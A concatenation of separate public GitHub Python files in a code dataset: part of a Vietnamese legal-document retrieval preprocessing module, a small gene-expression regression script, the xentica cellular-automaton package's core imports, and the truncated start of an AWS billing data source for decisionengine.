hiểu thế nào\",\n \"được quy định cụ thể là gì\",\n \"được quy định như thế nào\",\n \"được quy định thế nào\",\n \"được quy định như nào\",\n \"trong trường hợp như nào\",\n \"trong trường hợp như thế nào\",\n \"trong trường hợp nào\",\n \"trong những trường hợp nào\",\n \"được hiểu như thế nào\",\n \"được hiểu như nào\",\n \"như thế nào\",\n \"thế nào\",\n \"như nào\",\n \"là gì\",\n \"là ai\",\n \"là bao nhiêu\",\n \"bao nhiêu\",\n \"trước bao lâu\",\n \"là bao lâu\",\n \"bao lâu\",\n \"bao gồm gì\",\n \"không\",\n \"bao gồm những gì\",\n \"vào thời điểm nào\",\n \"gồm những giấy tờ gì\",\n \"những yêu cầu nào\",\n]\n\n# punctuations, characters, stop-words \npunc = \"\"\"!\"#$%&'()*+,-./:;<=>?@[\\]^`{|}~\"\"\" # noqa: W605\ntable = str.maketrans(\"\", \"\", punc)\n\npunctuation = [x for x in string.punctuation]\nnumber = 
[\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\"]\nchars = [\"a\", \"b\", \"c\", \"d\", \"đ\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\"]\nstop_word = number + chars + [\"của\", \"và\", \"các\", \"có\", \"được\", \"theo\", \"tại\", \"trong\", \"về\", \n \"hoặc\", \"người\", \"này\", \"khoản\", \"cho\", \"không\", \"từ\", \"phải\", \n \"ngày\", \"việc\", \"sau\", \"để\", \"đến\", \"bộ\", \"với\", \"là\", \"năm\", \n \"khi\", \"số\", \"trên\", \"khác\", \"đã\", \"thì\", \"thuộc\", \"điểm\", \"đồng\",\n \"do\", \"một\", \"bị\", \"vào\", \"lại\", \"ở\", \"nếu\", \"làm\", \"đây\", \n \"như\", \"đó\", \"mà\", \"nơi\", \"”\", \"“\"]\nbm25_removed = punctuation + stop_word\n\n# defining sub-functions\n\ndef remove_dieu_number(text):\n '''\n This funtion removes the common legal phrases out from texts\n '''\n text = re_thuchientheo.sub(\" \", text)\n text = re_thongtuso.sub(\" \", text)\n text = re_ngay.sub(\" \", text)\n text = re_thang_nam.sub(\" \", text)\n text = re_chuong.sub(\" \", text)\n return \" \".join(text.split())\n\n\ndef remove_other_number_by_zero(text):\n '''\n This funtion replaces numeric characters in texts into 0 for easier handling\n '''\n for digit in [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]:\n text = text.replace(digit, \"0\")\n return text\n\n\ndef remove_punct(text):\n '''\n This funtion replaces punctuations in texts for easier handling\n '''\n text = text.replace(\";\", \",\").replace(\":\", \".\").replace(\"“\", \" \").replace(\"”\", \" \")\n text = \"\".join(\n [\n c\n if c.isalpha() or c.isdigit() or c in [\" \", \",\", \"(\", \")\", \".\", \"/\", \"-\"]\n else \" \"\n for c in text\n ]\n )\n text = \" \".join(text.split())\n return text\n\ndef lower_or_keep(text):\n \"This funtion lower words but not for abbreviations\"\n lst = text.split(\" \")\n newlst = [x if x.isupper() else x.lower() for x in lst]\n return \" \".join(newlst)\n\ndef preprocess_all_title(article_title):\n \"\"\"\n Preprocess titles of documents\n \"\"\"\n article_title = lower_or_keep(article_title)\n lst = article_title.split()\n new_lst = []\n for i in range(len(lst)):\n if lst[i] == 'số' and i == len(lst)-1:\n new_lst.append(lst[i])\n elif lst[i] == 'số' and \"/\" in lst[i+1]:\n pass\n elif \"/\" in lst[i]:\n pass\n else:\n new_lst.append(lst[i])\n article_title = \" \".join(new_lst)\n article_title = remove_dieu_number(article_title)\n #article_title = remove_other_number_by_zero(article_title)\n article_title = remove_punct(article_title)\n article_title = article_title.replace(\"về\", \"\")\n if \"do\" in article_title and \"ban hành\" in article_title:\n idx = article_title.rfind(\"do\")\n article_title = article_title[:(idx-1)]\n \n re_head = re.compile(r\"(thông tư liên tịch|thông tư|nghị quyết|quyết định|nghị định|văn bản)\\s(quy định|hướng dẫn)?\")\n article_title = re_head.sub(\" \", article_title)\n article_title = article_title.replace(\" \", \" \")\n article_title = article_title.replace(\" \", \" \")\n return article_title.strip()\n\ndef preprocess_article_title(article_title):\n \"\"\"\n Preprocess titles of documents\n \"\"\"\n article_title = lower_or_keep(article_title)\n article_title = \" \".join(article_title.split()[2:]) # Dieu 1.\n article_title = remove_dieu_number(article_title)\n #article_title = remove_other_number_by_zero(article_title)\n article_title = remove_punct(article_title)\n return article_title\n \ndef preprocess_khoan(khoan):\n \"\"\"\n Perprocess parts in a legal 
documents\n \"\"\"\n khoan = lower_or_keep(khoan)\n khoan = khoan.replace(\"\\xa0\", \"\")\n matched = re.match(r\"^\\d+\\.(\\d+\\.?)?\\s\", khoan) # 1. 2.2. 2.2\n if matched is not None:\n khoan = khoan[matched.span()[1]:].strip()\n\n else:\n matched2 = re.match(r\"^[\\wđ]\\)\\s\", khoan)\n if matched2 is not None:\n khoan = khoan[matched2.span()[1]:].strip()\n\n khoan = remove_dieu_number(khoan)\n #khoan = khoan.replace(\"đ)\",\"\")\n khoan = re.sub(r\"[\\wđ]\\) \",\"\", khoan)\n khoan = re.sub(r\"[\\wđ]\\. \",\"\", khoan)\n khoan = re.sub(r\"\\d+\\.\\d+\\.\\d+\\. \", \"\", khoan)\n khoan = re.sub(r\"\\d+\\.\\d+\\. \", \"\", khoan)\n khoan = re.sub(r\"\\d+\\. \", \"\", khoan)\n #khoan = re.sub(r\"[0-9]\\. \", \"\", khoan)\n #khoan = remove_other_number_by_zero(khoan)\n khoan = remove_punct(khoan)\n khoan = khoan.replace(\". .\", \".\")\n khoan = khoan.replace(\"..\", \".\")\n khoan = khoan.replace(\", ,\", \",\")\n khoan = khoan.replace(\",,\", \",\")\n khoan = khoan.strip()\n return \" \".join(khoan.split())\n\n\ndef preprocess_question(q, remove_end_phrase=True):\n \"\"\"\n Preprocess questions\n \"\"\"\n q = lower_or_keep(q)\n q = remove_dieu_number(q)\n q = \"\".join([c if c.isalpha() or c.isdigit() or c == \" \" else \" \" for c in q])\n q = remove_punct(q)\n if remove_end_phrase:\n for phrase in END_PHRASES:\n if q.endswith(phrase):\n q = q[: -len(phrase)]\n break\n\n return q.strip()\n\n'''def tokenise(text, segmenter):\n \"\"\"\n Segment the texts with vncorenlp-segmenter\n \"\"\"\n result = segmenter.tokenize(text)\n rlt = \"\"\n for i in range(len(result)-1):\n rlt += \" \".join(result[i])\n rlt += \" \"\n rlt += \" \".join(result[len(result)-1])\n return rlt\n'''\ndef tokenise(text, f):\n \"\"\"\n Segment the texts with pyvi tokenizer\n \"\"\"\n return f(text)\n \ndef remove_stopword(w):\n \"Remove stopwords in texts\"\n return w not in stop_word\n\ndef bm25_process(text, f):\n \"\"\"\n Processing texts for bm25: remove all punctuation, lower all words\n \"\"\"\n text = tokenise(text, f)\n words = text.lower().split(\" \")\n result = [w for w in words if w not in bm25_removed]\n stripped = \" \".join(result)\n result = \" \".join(stripped.split(\" \"))\n return result\n\ndef length(sentence):\n \"Return the length in words of sentences\"\n return len(sentence.split())\n\ndef build_corpus(f, corpus_file, law_dict, scorpus_ids, head = False):\n \"\"\"\n Build a corpus-dataframe\n \"\"\"\n law_ids = []\n text_ids = []\n article_ids = []\n titles = []\n texts = []\n processed_texts = []\n tokenized_texts = []\n bm25texts = []\n lengths = []\n ids = []\n sub_ids = []\n count = 0\n\n with open (corpus_file, 'r') as input:\n data = json.load(input)\n \n for law in data:\n for article in law['articles']:\n ids.append(count)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_id = law['law_id'] + \"_\" + article['article_id']\n text_ids.append(text_id)\n \n titles.append(article['title'])\n texts.append(article['text'])\n \n title = preprocess_article_title(article[\"title\"])\n head = preprocess_all_title(law_dict[law['law_id']])\n \n cac_khoan = article[\"text\"].split(\"\\n\")\n khoan_clean = []\n for khoan in cac_khoan:\n khoan = preprocess_khoan(khoan)\n khoan_clean.append(khoan.strip())\n article_text = \" \".join(khoan_clean)\n if head:\n processed_text = head + \". \" + title + \". \" + article_text\n else:\n processed_text = title + \". \" + article_text + \". 
\" + head + \".\"\n processed_texts.append(processed_text)\n start_sub_id = scorpus_ids.index(count)\n try:\n end_sub_id = scorpus_ids.index(count+1)\n sub_ids.append([i for i in range(start_sub_id, end_sub_id)])\n except:\n sub_ids.append([i for i in range(start_sub_id, len(scorpus_ids))])\n \n try: \n tokenized_text = tokenise(processed_text, f)\n tokenized_texts.append(tokenized_text)\n lengths.append(length(tokenized_text))\n except:\n tokenized_text = tokenise(processed_text[:50000], f)\n tokenized_texts.append(tokenized_text)\n lengths.append(length(tokenized_text))\n bm25texts.append(bm25_process(processed_text, f))\n count += 1\n \n df = pd.DataFrame()\n df[\"id\"] = ids\n df[\"law_id\"] = law_ids\n df[\"article_id\"] = article_ids\n df[\"text_id\"] = text_ids\n df[\"title\"] = titles\n df[\"text\"] = texts\n df[\"processed_text\"] = processed_texts\n df[\"sub_id\"] = sub_ids\n df[\"tokenized_text\"] = tokenized_texts\n df[\"bm25text\"] = bm25texts\n df[\"len\"] = lengths\n \n return df\n\ndef create_sliding_window(tokenized_text, size=200, overlap=64):\n \"\"\"\n Create list of windows for a text\n \"\"\"\n sentences = tokenized_text.split(\".\")\n words = tokenized_text.split(\" \")\n title = sentences[0]\n words = [w for w in words if len(w) >0]\n actual_size = size - overlap\n \n windows = []\n n_windows = math.ceil(len(words)/actual_size)\n for i in range(n_windows):\n windows.append(\" \".join(words[i*actual_size:i*actual_size + size]))\n for i in range(1, n_windows):\n if not windows[i].startswith(\".\"):\n windows[i] = title + \". \" + windows[i]\n else:\n windows[i] = title + windows[i]\n return windows\n\ndef build_short_corpus(f, corpus_file, law_dict, head=False, size=200, overlap=64):\n \"\"\"\n Build a corpus-dataframe\n \"\"\"\n ids = []\n law_ids = []\n text_ids = []\n article_ids = []\n titles = []\n texts = []\n processed_texts = []\n sub_ids = []\n tokenized_texts = []\n bm25texts = []\n lengths = []\n\n with open (corpus_file, 'r') as input:\n data = json.load(input)\n idx = 0\n sub_idx = 0\n for law in data:\n for article in law['articles']:\n text_id = law['law_id'] + \"_\" + article['article_id']\n title = preprocess_article_title(article[\"title\"])\n head = preprocess_all_title(law_dict[law['law_id']])\n cac_khoan = article[\"text\"].split(\"\\n\")\n khoan_clean = []\n for khoan in cac_khoan:\n khoan = preprocess_khoan(khoan)\n khoan_clean.append(khoan.strip())\n article_text = \" \".join(khoan_clean)\n if head:\n processed_text = head + \". \" + title + \". \" + article_text\n else:\n processed_text = title + \". \" + article_text + \". 
\" + head + \".\"\n try: \n tokenized_text = tokenise(processed_text, f)\n tokenized_len = length(tokenized_text)\n if tokenized_len <= size + 10:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(tokenized_text)\n lengths.append(tokenized_len)\n bm25texts.append(bm25_process(processed_text, f))\n sub_idx +=1\n else:\n windows = create_sliding_window(tokenized_text, size=224, overlap=64)\n for window in windows:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(window)\n lengths.append(length(window))\n bm25texts.append(bm25_process(window, f)) \n sub_idx +=1\n except:\n actual_size = 50000 - overlap\n big_windows = []\n n_big_windows = math.ceil(len(processed_text)/actual_size)\n for i in range(n_big_windows):\n big_windows.append(\"\".join(processed_text[i*actual_size:i*actual_size + size]))\n for big_window in big_windows:\n tokenized_text = tokenise(big_window, f)\n tokenized_len = length(tokenized_text)\n if tokenized_len > size + 10:\n windows = create_sliding_window(tokenized_text, size=224, overlap=64)\n for window in windows:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(window)\n lengths.append(length(window))\n bm25texts.append(bm25_process(window, f)) \n sub_idx +=1\n else:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(tokenized_text)\n lengths.append(tokenized_len)\n bm25texts.append(bm25_process(processed_text, f))\n sub_idx +=1\n \n idx += 1\n \n df = pd.DataFrame()\n df[\"id\"] = ids\n df[\"law_id\"] = law_ids\n df[\"article_id\"] = article_ids\n df[\"text_id\"] = text_ids\n df[\"title\"] = titles\n df[\"text\"] = texts\n df[\"processed_text\"] = processed_texts\n df[\"sub_id\"] = sub_ids\n df[\"tokenized_text\"] = tokenized_texts\n df[\"bm25text\"] = bm25texts\n df[\"len\"] = lengths\n \n return df\n\ndef build_qa(f, df, qa_file, split = False):\n \"\"\"\n Build a question-answer dataframe\n \"\"\"\n text_ids = df[\"text_id\"].tolist()\n titles = df[\"title\"].tolist()\n texts = df[\"text\"].tolist()\n lengths = df[\"len\"].tolist()\n sub_ids = df[\"sub_id\"].tolist()\n q_texts = []\n q_processed_texts = []\n q_tokenized_texts = []\n q_bm25texts = []\n q_lens = []\n no_ans = []\n ans_ids = []\n ans_text_ids = []\n ans_titles = []\n ans_texts = []\n ans_lens = []\n ans_sub_ids = []\n with open (qa_file, 'r') as input:\n data = json.load(input)\n \n if not split:\n for item in data['items']:\n question = item[\"question\"]\n q_texts.append(question)\n q_processed_text = preprocess_question(question, remove_end_phrase=False)\n q_processed_texts.append(q_processed_text)\n q_tokenized_text = tokenise(q_processed_text, f)\n q_tokenized_texts.append(q_tokenized_text)\n 
q_bm25texts.append(bm25_process(q_processed_text, f))\n q_lens.append(length(q_tokenized_text))\n ans_text_id = \"\"\n ans_id = \"\"\n ans_title = \"\"\n ans_text = \"\"\n ans_len = \"\"\n ans_count = 0\n ans_sub_id = []\n for i in range(len(item['relevant_articles'])):\n ans_count += 1\n atext_id = item['relevant_articles'][i]['law_id'] + \"_\" + item['relevant_articles'][i]['article_id']\n a_id = text_ids.index(atext_id)\n ans_text_id += atext_id\n ans_id += str(a_id)\n ans_title += titles[a_id]\n ans_text += texts[a_id]\n ans_len += str(lengths[a_id])\n sub_id = sub_ids[a_id]\n ans_sub_id += sub_id\n \n if i < len(item[\"relevant_articles\"]) - 1:\n ans_text_id += \", \"\n ans_id += \", \"\n ans_title += \", \"\n ans_text += \", \"\n ans_len += \", \"\n \n no_ans.append(ans_count)\n ans_text_ids.append(ans_text_id)\n ans_ids.append(ans_id)\n ans_titles.append(ans_title)\n ans_texts.append(ans_text)\n ans_lens.append(ans_len)\n ans_sub_ids.append(ans_sub_id)\n else:\n for item in data['items']:\n question = item[\"question\"]\n for article in item['relevant_articles']:\n q_texts.append(question)\n q_processed_text = preprocess_question(question, remove_end_phrase=False)\n q_processed_texts.append(q_processed_text)\n q_tokenized_text = tokenise(q_processed_text, f)\n q_tokenized_texts.append(q_tokenized_text)\n q_bm25texts.append(bm25_process(q_processed_text, f))\n q_lens.append(length(q_tokenized_text)) \n ans_text_id = article['law_id'] + \"_\" + article['article_id']\n ans_text_ids.append(ans_text_id)\n a_id = text_ids.index(ans_text_id)\n ans_ids.append(a_id)\n ans_titles.append(titles[a_id])\n ans_texts.append(texts[a_id])\n ans_lens.append(lengths[a_id])\n ans_sub_ids.append(sub_ids[a_id])\n \n \n df = pd.DataFrame()\n df[\"question\"] = q_texts\n df[\"processed_question\"] = q_processed_texts\n df[\"tokenized_question\"] = q_tokenized_texts\n df[\"bm25_question\"] = q_bm25texts\n df[\"ques_len\"] = q_lens\n if not split:\n df['no_ans'] = no_ans\n df[\"ans_text_id\"] = ans_text_ids\n df[\"ans_id\"] = ans_ids\n df[\"ans_title\"] = ans_titles\n df[\"ans_text\"] = ans_texts\n df[\"ans_len\"] = ans_lens\n df[\"ans_sub_id\"] = ans_sub_ids\n \n return df\n\ndef build_biencoder_data(dqa_split, bm25, set_ques, no_hneg, no_search):\n \"\"\"\n Build train, val, test, dataframe used for biencoder training\n \"\"\"\n qa_ids = []\n neg_ids = []\n search_ids = []\n q_texts = dqa_split['question'].tolist()\n q_bm25texts = dqa_split['bm25_question'].tolist()\n count = 0\n ans_ids = dqa_split['ans_id'].tolist()\n ids = [i for i in range(bm25.corpus_size)]\n for i in range(len(q_texts)):\n if q_texts[i] in set_ques:\n qa_ids.append(i)\n q_bm25 = q_bm25texts[i].split(\" \")\n bm25_ids = bm25.get_top_n(q_bm25, ids, n=no_search)\n if ans_ids[i] in bm25_ids:\n count += 1\n \n neg = bm25_ids[:(no_hneg+1)]\n if ans_ids[i] in neg:\n neg.remove(ans_ids[i])\n \n neg = neg[:no_hneg]\n neg_ids.append(neg)\n search_ids.append(bm25_ids)\n print(count/len(qa_ids)) \n df = dqa_split.loc[qa_ids]\n df['neg_ids'] = neg_ids\n df['search_ids'] = search_ids\n return df\n\ndef build_short_data(df, dcorpus, limited_length = 234):\n \"\"\"\n Build short data\n \"\"\"\n ids = [i for i in range(len(df)) if dcorpus['len'][df['ans_id'][i]] <= limited_length]\n dshort = df.loc[ids].copy(deep= True).reset_index(drop=True)\n return dshort\n\ndef build_general_data(dqa, bm25, set_ques, no_hneg, no_search):\n \"\"\"\n Build general train, test, val dataframe\n \"\"\"\n qa_ids = []\n neg_ids = []\n search_ids = []\n q_texts = 
dqa['question'].tolist()\n q_bm25texts = dqa['bm25_question'].tolist()\n ans_ids = dqa['ans_id'].tolist()\n ids = [i for i in range(bm25.corpus_size)]\n count = 0\n \n for i in range(len(q_texts)):\n if q_texts[i] in set_ques:\n qa_ids.append(i)\n q_bm25 = q_bm25texts[i].split(\" \")\n ans_id = [int(x) for x in ans_ids[i].split(\", \")]\n bm25_ids = bm25.get_top_n(q_bm25, ids, n= no_search)\n search_ids.append(bm25_ids)\n \n for a_id in ans_id:\n if a_id in bm25_ids:\n bm25_ids.remove(a_id)\n neg_id = bm25_ids[:no_hneg]\n neg_ids.append(neg_id)\n if len(bm25_ids) == (no_search - len(ans_id)):\n count += 1 \n \n df = dqa.loc[qa_ids]\n df['neg_ids'] = neg_ids\n df['search_ids'] = search_ids\n print(count/len(qa_ids))\n return df","repo_name":"coangquang/legal_retrieval","sub_path":"src/dpr/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":23463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72290021541","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 29 16:36:09 2020\r\n\r\n@author: LilyHeAsamiko\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom sklearn import preprocessing\r\nfrom scipy import stats\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n#regression on TF\r\ndataset = pd.read_csv(r'/Users/he/Downloads/WiML-master/MAdata_DGinMCout.txt',sep='\\t', header = 0)\r\norigindata = np.exp(dataset)\r\ndataset1 = pd.read_csv(r'/Users/he/Downloads/WiML-master/raw_data_DGinMCout.tsv',sep='\\t', header = 0)\r\nfadata = pd.read_csv(r'/Users/he/Downloads/WiML-master/Alignment_for_family_PTHR11679_SF35.txt',sep='\\t', header = 0)\r\n\r\n#X = origindata\r\n#X.iloc[0:25,0] = dataset1.iloc[0:25,5]\r\n#X.iloc[0:25,1] = dataset1.iloc[25:50,5]\r\n#X.iloc[0:25,2] = dataset1.iloc[50:75,5]\r\nX= np.zeros((np.shape(dataset)))\r\nX[0:25,0] = dataset1.iloc[0:25,5]\r\nX[0:25,1] = dataset1.iloc[25:50,5]\r\nX[0:25,2] = dataset1.iloc[50:75,5]\r\n\r\nN,c = np.shape(origindata)\r\n#compare V1: dg_v, V2: dg_c\r\nbeta = np.dot(X.T,origindata)/N\r\nbeta = np.array(beta)\r\nbeta0 = beta\r\nsteps = 100\r\nbtemp = 0.1\r\ndb = 0.1\r\nlse = np.ones(np.shape(origindata))*10**5\r\nres = np.zeros((c,steps))\r\n#regression\r\nfor b in range(c):\r\n for s in range(steps):\r\n# temp = btemp*X.iloc[:,b]\r\n# temp = np.unique((np.array(origindata.iloc[:,b]).reshape(N,1)-temp.reshape(N,1)-np.random.normal(0,1,N).reshape(N,1)))**2\r\n# temp = np.array(btemp*X[:,b])\r\n# temp = (np.array(origindata.iloc[:,b])-temp-np.random.normal(0,1,N).T)**2\r\n e = np.random.normal(0,1,N).T\r\n temp = (np.array(origindata.iloc[:,b])-np.array(btemp*X[:,b])-e)**2\r\n temp[np.isnan(temp)]=0\r\n# if sum(temp.reshape(N,1) - lse.reshape(N,1))<0:\r\n if sum(temp - lse[:,b])<0:\r\n beta[b,b] = btemp\r\n btemp += db\r\n lse[:,b] = temp \r\n res[b,s] = np.sqrt(sum(lse[:,b])/N)\r\n else:\r\n btemp = (btemp +db)/2\r\n e = np.random.normal(0,1,N).T\r\n temp= (np.array(origindata.iloc[:,b])-np.array(btemp*X[:,b])-e)**2\r\n if sum(temp - lse[:,b])<0:\r\n beta[b,b] = btemp\r\n btemp += db\r\n lse[:,b] = temp \r\n res[b,s] = np.sqrt(sum(lse[:,b])/N)\r\n else:\r\n res[b,s] = np.sqrt(res[b,s-1]/N)\r\n # temp[np.isnan(temp)]=0\r\n# res[b,s] = np.mean(res[b,0:s-1]/s)\r\nC = np.corrcoef(X,X)\r\nplt.pcolor(C[0:25,0:25])\r\nplt.title('correlation of three cells TF')\r\nLD = np.zeros((np.shape(origindata)))\r\n#LD score:\r\nfor i in range(c):\r\n LD[:,i] = 
origindata.iloc[:,i]**2+origindata.iloc[:,i]*origindata.iloc[:,np.mod(i+1,3)]+origindata.iloc[:,i]*origindata.iloc[:,np.mod(i+2,3)]\r\nplt.pcolor(LD)\r\nplt.title('LD_Score of three cells TF')\r\n \r\nplt.scatter(origindata, np.dot(X,beta))\r\nplt.title('three cells TF regression')\r\n\r\n\r\n#Compare enrichment of fa dataset(as the sequence is not complete but only alignment data, there we compare enrichment only on family fasta sequence)\r\nStr_Tnig = np.array(fadata.iloc[0:125],dtype = str)\r\nStr_Onil = np.array(fadata.iloc[127:252],dtype = str)\r\n#Common allele:\r\nrows = np.shape(Str_Onil)[0] \r\ncols = len(str(Str_Onil[0,:]))\r\nco = np.zeros((rows, cols))\r\ncE = 0\r\nS = ['A','R','N','D','C','Q','E','G','H','I','L','K','M','F','P','S','T','W','Y','V']\r\nfor i in range(np.shape(Str_Onil)[0]):\r\n co[i,:] = str(Str_Onil[i,:])==str(Str_Tnig[i,:])\r\n cE += sum(co[i,:]>0)\r\nM = rows*cols \r\nEnrichment_Tnig_Onil = np.zeros((rows, 2,2))\r\nTnigID = np.zeros((rows, cols,len(S)))\r\nOnilID = TnigID \r\nfor i in range(rows):\r\n for s in range(len(S)):\r\n# TnigID[i,:,s] = str(Str_Tnig[i,:])[~co[i,:]]==S[s]\r\n# OnilID[i,:,s] = str(Str_Onil[i,~co[i,:]]==S[s]\r\n# OnilID[i,:,s] = str(Str_Onil[i,:])[~co[i,:]]==S[s]\r\n #temp1 = str(Str_Tnig[i,])[:]\r\n TnigID[i,:,s] = str(Str_Tnig[i,]).find(S[s])\r\n #print(len(temp1))\r\n #temp2 = str(Str_Onil[i,])[:]\r\n #print(len(temp2))\r\n OnilID[i,:,s] = str(Str_Onil[i,]).find(S[s])\r\n #tempTid = TnigID[i,:,s]>=0\r\n #tempOid = OnilID[i,:,s]>=0\r\n #tempc = np.corrcoef(TnigID[i,tempTid,s],OnilID[i,tempOid,s])\r\n #tempc[np.isnan(tempc)] = 0\r\n #Enrichment_Tnig_Onil[i,s,:,:] = tempc\r\n tempTid = TnigID[i,:,:]>=0\r\n tempOid = OnilID[i,:,:]>=0\r\n tempc = np.corrcoef(TnigID[i,tempTid],OnilID[i,tempOid])\r\n tempc[np.isnan(tempc)] = 0\r\n Enrichment_Tnig_Onil[i,:,:] = tempc\r\n\r\n#fig = plt.figure()\r\n#ax = fig.add_subplot(111,projection = '3d')\r\n#ax.scatter(np.linspace(0,2,10),np.linspace(0,2,10),Enrichment_Tnig_Onil.T)\r\nEnrichment1 = sum(Enrichment_Tnig_Onil[Enrichment_Tnig_Onil>0]**2)/cE/((sum(Enrichment_Tnig_Onil[Enrichment_Tnig_Onil<=0]**2))/(rows*cols-cE)+1)","repo_name":"LilyHeAsamiko/neurocomputation","sub_path":"Regulatory elements inferenced by TF/LD.py","file_name":"LD.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"8125726812","text":"# -*- coding: utf-8 -*-\n\"\"\"\nXentica core functionality is available via modules from this package.\n\nIn addition, you may use ``core`` package as a shortcut to the main\nclasses of the framework.\n\n- **Base classes**\n - ``core.CellularAutomaton`` →\n :class:`xentica.core.base.CellularAutomaton`\n - ``core.Experiment`` →\n :class:`xentica.core.experiment.Experiment`\n\n- **Lattices**\n - ``core.OrthogonalLattice`` →\n :class:`xentica.core.topology.lattice.OrthogonalLattice`\n\n- **Neighborhoods**\n - ``core.MooreNeighborhood`` →\n :class:`xentica.core.topology.neighborhood.MooreNeighborhood`\n - ``core.VonNeumannNeighborhood`` →\n :class:`xentica.core.topology.neighborhood.VonNeumannNeighborhood`\n\n- **Borders**\n - ``core.TorusBorder`` →\n :class:`xentica.core.topology.border.TorusBorder`\n - ``core.StaticBorder`` →\n :class:`xentica.core.topology.border.StaticBorder`\n\n- **Properties**\n - ``core.IntegerProperty`` →\n :class:`xentica.core.properties.IntegerProperty`\n - ``core.FloatProperty`` →\n :class:`xentica.core.properties.FloatProperty`\n - ``core.TotalisticRuleProperty`` →\n 
:class:`xentica.core.properties.TotalisticRuleProperty`\n - ``core.RandomProperty`` →\n :class:`xentica.core.properties.RandomProperty`\n\n- **Parameters**\n - ``core.Parameter`` →\n :class:`xentica.core.parameters.Parameter`\n\n- **Variables**\n - ``core.IntegerVariable`` →\n :class:`xentica.core.variables.IntegerVariable`\n - ``core.FloatVariable`` →\n :class:`xentica.core.variables.FloatVariable`\n\nThe classes listed above are all you need to build CA models and\nexperiments with Xentica, unless you are planning to implement custom\ncore features like new lattices, borders, etc.\n\n\"\"\"\nfrom xentica.core.base import CellularAutomaton\nfrom xentica.core.properties import (\n IntegerProperty,\n FloatProperty,\n TotalisticRuleProperty,\n RandomProperty,\n)\nfrom xentica.core.variables import (\n IntegerVariable, FloatVariable,\n)\nfrom xentica.core.parameters import (\n Parameter,\n)\nfrom xentica.core.topology.lattice import (\n OrthogonalLattice,\n)\nfrom xentica.core.topology.neighborhood import (\n MooreNeighborhood, VonNeumannNeighborhood\n)\nfrom xentica.core.topology.border import (\n TorusBorder, StaticBorder,\n)\nfrom xentica.core.experiment import Experiment\n\n__all__ = [\n 'CellularAutomaton',\n 'IntegerProperty',\n 'FloatProperty',\n 'TotalisticRuleProperty',\n 'RandomProperty',\n 'Parameter',\n 'IntegerVariable',\n 'FloatVariable',\n 'OrthogonalLattice',\n 'MooreNeighborhood',\n 'VonNeumannNeighborhood',\n 'TorusBorder',\n 'StaticBorder',\n 'Experiment',\n]\n","repo_name":"a5kin/xentica","sub_path":"xentica/core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"35"} +{"seq_id":"40702347756","text":"import datetime\nimport time\n\nimport pandas as pd\n\nfrom bill_calculator_hep.AWSBillAnalysis import AWSBillCalculator\n\nfrom decisionengine.framework.modules import Source\nfrom decisionengine.framework.modules.Source import Parameter\nfrom decisionengine_modules.AWS.sources import DEAccountContants\n\n\n@Source.supports_config(\n Parameter(\n \"billing_configuration\",\n type=dict,\n comment=\"\"\"Configuration required to get AWS billing information. 
Supports the layout:\n\n {\n 'AWSRnDAccountConstants': {\n 'lastKnownBillDate': '08/01/16 00:00', # '%m/%d/%y %H:%M'\n 'balanceAtDate': 3839.16, # $\n 'accountName': 'RnD',\n 'accountNumber': 159067897602,\n 'credentialsProfileName': 'BillingRnD',\n 'applyDiscount': True, # DLT discount does not apply to credits\n 'costRatePerHourInLastSixHoursAlarmThreshold': 2, # $ / h # $10/h\n 'costRatePerHourInLastDayAlarmThreshold': 2, # $ / h # $10/h\n 'emailReceipientForAlarms': 'fermilab-cloud-facility-rnd@fnal.gov'\n }\n }\"\"\",\n ),\n Parameter(\"dst_dir_for_s3_files\", type=str, comment=\"Directory for AWS billing files\"),\n Parameter(\"verbose_flag\", type=bool),\n)\n@Source.produces(AWS_Billing_Info=pd.DataFrame, AWS_Billing_Rate=pd.DataFrame)\nclass BillingInfo(Source.Source):\n def __init__(self, config):\n super().__init__(config)\n acconts_config_file = config[\"billing_configuration\"]\n self.billing_files_location = config[\"dst_dir_for_s3_files\"]\n self.verbose_flag = int(config[\"verbose_flag\"])\n # Load known accounts configuration\n account_dict = DEAccountContants.load_constants(acconts_config_file)\n self.accounts = []\n for val in account_dict.values():\n self.accounts.append(DEAccountContants.AccountConstants(val))\n\n def acquire(self):\n \"\"\"\n Method to be called from Task Manager.\n redefines acquire from Source.py\n Acquire AWS billing info and return as pandas frame\n\n :rtype: :obj:`~pd.DataFrame`\n \"\"\"\n\n # get data for all accounts\n self.logger.debug(\"in BillingInfo acquire\")\n data = []\n datarate = []\n globalConf = {\n \"graphite_host\": \"dummy\",\n \"graphite_context_billing\": \"dummy\",\n \"outputPath\": self.billing_files_location,\n \"accountDirs\": 1,\n }\n for i in self.accounts:\n constantsDict = {\n 